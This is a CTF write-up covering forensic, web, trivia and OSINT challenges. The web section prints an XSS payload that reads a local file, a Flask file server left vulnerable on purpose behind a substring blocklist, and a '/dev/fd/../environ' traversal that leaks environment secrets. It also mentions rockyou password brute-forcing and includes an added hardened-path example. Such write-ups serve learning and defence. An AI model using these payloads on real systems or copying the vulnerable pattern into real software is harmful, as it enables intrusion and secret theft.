DKHOS CTF - WriteUps & Details

Forensic 300 - Hadi Hoppala ve de Cuppala

The link provided in the task was a corrupted file with no clue.

After a brief inspection of the header, I understood that this was a 7z file that had been corrupted.

Found the instructions for the proper header and footer values at http://www.7-zip.org/recover.html and started working on this in the last 20 minutes, but couldn't make it in time as I was having problems with the CRC checksum.

Just FYI, I also spent some time on it after the CTF officially ended. This 7z file was also password protected. To crack it I used brute-forcing with rockyou and found that 'piggies' was the password.

Flag:

DKHOS_{4l_G1rd1n_g1rd1n}

Web 200 – Kımızım Kandan Bahtım Karadan

When we accessed the IP provided, a web page with 'Not Found' text welcomed us. After inspecting the website code we found the GitHub repo of the blog theme.

From here, the first thing to do was actually diffing the repo against the code on the site, and we found a file upload section. Here we also found an XSS vulnerability in the Filename attribute, and things were going really smoothly!

With the code

<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///flag.txt");
x.send();
</script>

We were able to get the fl.. Unfortunately, it wasn't that easy :).

Just under the page, we saw the 'DEV' environment and thought this could be a virtual host. We prepared the query and got the response:

import os
from flask import Flask, request

app = Flask(__name__)

# Substring blocklist: a request is denied if any of these appears anywhere in the name.
blist = (
    'proc',
    'www',
    'var',
    'etc',
    'root',
    'home',
    'self',
    'flag'
)

def get_flag():
    # The flag lives in the process environment, not in a file on disk.
    return os.environ.get('FLAG', '')

def super_firewall(path):
    for b in blist:
        if b in path:
            return False
    return True

@app.route("/")
def hello():
    return "internal file storage, /file?name="

@app.route("/file")
def get_file():
    name = request.args.get('name', 'server.py')
    if not name:
        name = 'server.py'
    status = super_firewall(name)
    if not status:
        return "access denied"
    # The name is opened exactly as given: no canonicalisation and no base-directory check.
    with open(name, 'r') as fp:
        content = fp.read()
        return content

if __name__ == '__main__':
    app.run(debug=False)

From here, it can be seen that FLAG was stored as an environment variable and we had to echo it somehow. To do that, we also needed to bypass this mini filter, blist.

After a couple of trials and errors we prepared the query as:

/file?name=/dev/fd/../environ

and we got the flag:

LANG=en_US.UTF-8SUPERVISOR_SERVER_URL=unix:///var/run/supervisor.sockSUPERVISOR_ENABLED=1SUPERVISOR_PROCESS_NAME=internal
FLAG=DKHOS_{y0u_g0t_m3_pyth0n1st4}SUPERVISOR_GROUP_NAME=internalPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
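To show why a substring blocklist is the wrong control for this endpoint, here is an added example (not from the write-up or the challenge) that puts the challenge's super_firewall beside a canonicalise-and-contain check: safe_resolve, run_checks and the temporary base directory are assumptions of the example, not part of the original server.

```python
import os
import tempfile
from typing import Optional

# Blocklist copied from the challenge's server.py: each entry is a substring test.
BLIST = ('proc', 'www', 'var', 'etc', 'root', 'home', 'self', 'flag')

def super_firewall(path: str) -> bool:
    """The challenge's filter: allow unless a blocked substring appears."""
    return not any(b in path for b in BLIST)

def safe_resolve(name: str, base_dir: str) -> Optional[str]:
    """Hardened replacement (assumed, not from the challenge).

    Reject absolute names and NUL bytes, canonicalise the rest under
    base_dir with realpath (which also follows symlinks such as
    /dev/fd -> /proc/self/fd), then require the result to stay inside
    base_dir. Returns the resolved path, or None if the request is denied.
    """
    if not name or '\x00' in name or os.path.isabs(name):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def run_checks() -> dict:
    """Constructed inputs: the write-up's bypass, a plain traversal, a legit name."""
    base = tempfile.mkdtemp()  # constructed base directory for the example
    with open(os.path.join(base, 'server.py'), 'w') as fp:
        fp.write('# constructed placeholder file\n')
    legit = os.path.join(os.path.realpath(base), 'server.py')
    return {
        'blocklist_passes_bypass': super_firewall('/dev/fd/../environ'),
        'blocklist_blocks_obvious': not super_firewall('/proc/self/environ'),
        'hardened_rejects_bypass': safe_resolve('/dev/fd/../environ', base) is None,
        'hardened_rejects_traversal': safe_resolve('../../passwd', base) is None,
        'hardened_allows_legit': safe_resolve('server.py', base) == legit,
    }

if __name__ == '__main__':
    for check, ok in run_checks().items():
        print(f'{check}: {"ok" if ok else "FAIL"}')
```

The first result shows the alias path sails through the blocklist because none of the listed words appear in it; the hardened check never inspects the string at all and instead rejects anything whose resolved location leaves the storage directory.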

Trivia 400 – Kişi Faizi

Right after seeing these 'intentional English translation fails', I directly understood from the title that this was about the TV series 'Person of Interest'.

In the description, a document about Frank Stephens's death was mentioned and the flag was the date on it. After a brief search on the net, I found that Season 1 Episode 3 could be helpful, but watching the whole episode didn't make any sense. Thus I found the episode's conversation script and searched for the name.

After guessing the time according to these, the document with the flag was on that exact frame.

Cyber Intelligence 300 – Naber?

From the task description, it was clear that this was a social platform lookup.

On Instagram, I found the user with an interesting post. Looking closer, it can be understood that it was a GitHub account!

There was nothing suspicious in this repo as it was just a fork of another repo. Then in the commits I found some nasty stuff.

From here, I found the pastebin account:

There was a strange text with a code in this pastebin. After trying Telegram groups, we wanted to try WhatsApp and found the flag as the name of the group!
